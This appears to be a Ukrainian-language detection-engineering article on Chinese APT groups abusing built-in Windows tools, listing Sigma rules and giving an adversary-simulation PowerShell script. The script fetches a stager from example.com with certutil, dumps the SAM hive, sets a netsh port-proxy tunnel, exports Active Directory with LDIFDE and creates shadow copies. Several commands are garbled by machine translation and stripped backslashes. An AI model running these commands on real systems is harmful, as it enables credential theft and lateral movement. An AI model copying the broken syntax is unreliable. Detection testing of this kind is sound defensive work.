Полювання на китайські APT-групи, що зловживають стандартними Windows-інструментами
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У статті досліджено, як китайські групи просунутих постійних загроз зловживають вбудованими утилітами Windows, які часто називають LOLBAS, для проведення розвідки, крадіжки облікових даних і переміщення мережею, легко маскуючись під рутинну адміністративну діяльність.
Розслідування
Вона підкреслює специфічне використання командного рядка вбудованих інструментів, таких як nltest, certutil, netsh, reg.exe, vssadmin, та інших, і вказує на правила Sigma, які можуть допомогти виявити ці техніки в рамках платформ SIEM.
Пом’якшення
Захисникам рекомендується стежити за підозрілими виконаннями вбудованих бінарних файлів Windows, запроваджувати контролі доступу з мінімальними правами, перевіряти зміни в реєстрі та розгортати логіку виявлення на основі згаданих паттернів Sigma.
Відповідь
Коли виявлено підозрілу діяльність LOLBAS, команди безпеки повинні викликати оповіщення, ізолювати заражений вузол, зібрати відповідні журнали, підтвердити, чи відбувся скидання облікових даних або переміщення мережею, та провести судово-медичний аналіз будь-яких отриманих артефактів.
Напад Flow
Ми все ще оновлюємо цю частину. Підпишіться, щоб отримувати сповіщення
Повідомити менеВиявлення
Можливе перерахування системи (через командний рядок)
Переглянути
Можливе перерахування або маніпуляція обліковими записами або групами (через командний рядок)
Переглянути
Підозріле виявлення доменних довірчих зв’язків (через командний рядок)
Переглянути
LOLBAS wmic (через командний рядок)
Переглянути
LOLBAS DNSCmd (через командний рядок)
Переглянути
Використання Certutil для кодування даних та операцій із сертифікатами (через командний рядок)
Переглянути
Підозріла діяльність VSSADMIN (через командний рядок)
Переглянути
Можливе скидання SAM/SYSTEM/SECURITY (через командний рядок)
Переглянути
Підозріла діяльність Ntdsutil (через командний рядок)
Переглянути
Підозріле копіювання SAM/SECURITY/NTDS.dit через тіньове копіювання (через командний рядок)
Переглянути
Підозріле використання утиліт Windows для розвідки та крадіжки облікових записів [створення процесів у Windows]
Переглянути
Виконання моделювання
Передумова: перевірка телеметрії і базового стану повинні бути успішно пройдені.
Обгрунтування: цей розділ деталізує точне виконання техніки супротивника (TTP), спроектованої для активації правила виявлення. Команди та наративи МАСИВНО відображають ідентифіковані TTP та прагнуть генерувати точну телеметрію, очікувану логікою виявлення.
-
Наратив атаки та команди:
Зловмисник, який отримав первісний доступ до робочої станції з приєднаним доменом Windows, намагається відобразити домен, перерахувати привілейовані групи та зібрати матеріали облікових даних, використовуючи тільки вбудовані бінарні файли, щоб уникнути виклику традиційних антивірусних підписів. Кроки включають:
- Перерахування контролерів домену:
nltest /dclist:domain.local– виводить всі контролери домену в цільовому домені. - Збирання інформації про систему:
systeminfo– збирає версію ОС, патчі та деталі обладнання. - Перерахування запущених процесів:
tasklist– надає інформацію про привілейовані служби. - Запит журналів подій Windows на входи:
Get-EventLog -LogName Security -InstanceId 4624(PowerShell) – витягує події успішного входу. - Завантаження зупиненого пейлоаду:
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe– використовує certutil для обходу веб-фільтрації. - Перерахування локальних адміністраторів:
net localgroup administrators– визначає привілейовані облікові записи. - Експорт гіва реєстру SAM:
reg.exe save hklmsam C:sam.save– намагається вивантажити хеші паролів. - Створення проксі-порту для переймання:
netsh интерфейс portproxy додати v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389– підготовка тунелю. - Перерахування DNS-записів:
dnscmd . /enumrecords /zone– виявлення внутрішніх зон DNS. - Експорт об’єктів AD через LDIFDE:
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree– вивантажує дані каталогу. - Створення тіньової копії тома:
vssadmin створити тінь /for=C:– дозволяє доступ на рівні файлів до заблокованих файлів.
Кожна команда точно відповідає одному зі строк ‘CommandLine|contains’ у правилі Sigma, забезпечуючи, що правило буде спрацьовувати на відповідні події створення процесів.
- Перерахування контролерів домену:
-
Скрипт регресійного тестування: (PowerShell – автономний, вимагає прав адміністратора)
# TC-20260518-A7B9K – Імітація використання супротивником вбудованих утиліт Windows # ПРИМІТКА: Запустіть на Windows-хості з приєднаним доменом та з правами адміністратора. # 1. Перерахування контролерів домену nltest /dclist:domain.local # 2. Інформація про систему systeminfo # 3. Перерахування процесів tasklist # 4. Витяг журналів подій безпеки (PowerShell) Get-EventLog -LogName security -InstanceId 4624 # 5. Завантаження зупиненого завантаження через certutil certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe # 6. Перерахування локальних адміністраторів net localgroup administrators # 7. Експорт об’єму SAM reg.exe save hklmsam C:sam.save # 8. Налаштування порт-проксі netsh интерфейс portproxy додати v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 # 9. Перерахування зон DNS dnscmd . /enumrecords /zone # 10. Експорт даних AD через LDIFDE ldifde.exe -f C:WindowsTempad_dump.txt -p subtree # 11. Створення тіньової копії тома vssadmin створити тінь /for=C: -
Команди чистки:
# Видалення файлів, створених під час імітації Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue # Видалення правила порт-проксі netsh интерфейс portproxy delete v4tov4 listenport=4444 # Видалення тіньової копії (опціонально – вимагає ідентифікатор тіньової копії) # vssadmin delete shadows /for=C: /all /quiet